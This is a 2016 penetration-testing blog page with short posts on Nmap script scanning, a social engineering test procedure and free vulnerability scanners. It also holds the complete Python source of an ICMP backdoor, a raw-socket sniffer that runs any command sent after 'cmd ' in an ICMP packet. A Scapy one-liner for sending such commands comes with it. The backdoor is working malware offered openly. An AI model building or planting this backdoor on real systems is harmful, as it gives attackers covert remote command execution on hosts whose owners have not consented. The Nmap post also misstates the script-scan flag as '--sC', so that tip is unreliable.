Monday, October 10, 2016

Utilizing Nmap to launch a vulnerability scanning.

Reference: https://nmap.org/book/nse.html

First, update your NSE database through executing the command below.
nmap --script-updatedb

Second, enable the vulnerability scanning functionality by adding the argument --sC as shown in the following.

nmap -sC 192.168.0.1
Posted by at No comments:

A procedure regarding Social Engineering Test in my opinion.

The Social Engineering test’s procedure, which is similar to the technical test, is also composed of five steps, namely Reconnaissance, Confirmation, Implementation, Analysis, Report. Here is the detail of each step:
1)  Reconnaissance: Use such social platforms as Google and Linkedin to locate candidates who may be tested targets.
2) Confirmation: Confirm with the client about the tested methodologies and the individuals as tested targets before documenting the test plan. Bear in mind that the precise time frame of the implementation should not be known by the client in advance in order to estimate the client's incident response ability.
3) Implementation: Launch the SE test in accordance with the aforementioned test plan; record every reaction from the targets during the implementation.
4) Analysis: Analyze the reactions. Normally, the incident response team of the client may confirm the situation with the SE team.
5) Report: Document the analysis report after the SE test is done, and submit the report before holding a meeting to discuss the detail regarding the result.



Posted by at No comments:

Saturday, October 8, 2016

Free traditional vulnerability scanners

For some reasons, as such Fuzz scanning as SQL Injection scanning and XSS scanning may not be able to be fulfilled, the traditional vulnerability scanning would be more significant so that penetration testers can get as many vulnerabilities regarding targets as possible. There are some free traditional vulnerability scanners' names below.


  • OpenVAS
  • Armitage (based on Metasploit Framework)
  • Sparta (based on Nmap and Nikto)

Wish you audiences could give me more names. Thank you.
Posted by at No comments:

Saturday, October 1, 2016

An ICMP backdoor written recently.

#!/usr/bin/python
#Written by demonalex on Oct 1, 2016
#PoC with Scapy: send(IP(dst="192.168.0.3")/ICMP()/"cmd echo 1 > c:\test.txt")
import socket, re, sys, subprocess

host = socket.gethostname()

#A sniffer dedicated to ICMP
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
s.bind((host,0))

s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)

s.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)
#A sniffer dedicated to ICMP

while 1:
# receive a package
    icmp_packet = s.recvfrom(65535)
    ipacket=str(icmp_packet)
    #print type(ipacket), ":", ipacket
    try:
        matchstr = re.search(r'cmd (.*)\', \(\'', ipacket, re.M|re.I)
        if matchstr:
            #print matchstr.group(1)
            command = matchstr.group(1)
            subprocess.check_output(command, shell=True)
            #print "Executed \'", command, "\'"
    except:
        print "Execution failed."
        continue

# disabled promiscuous mode
s.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF)
Posted by at No comments:
Subscribe to: Posts (Atom)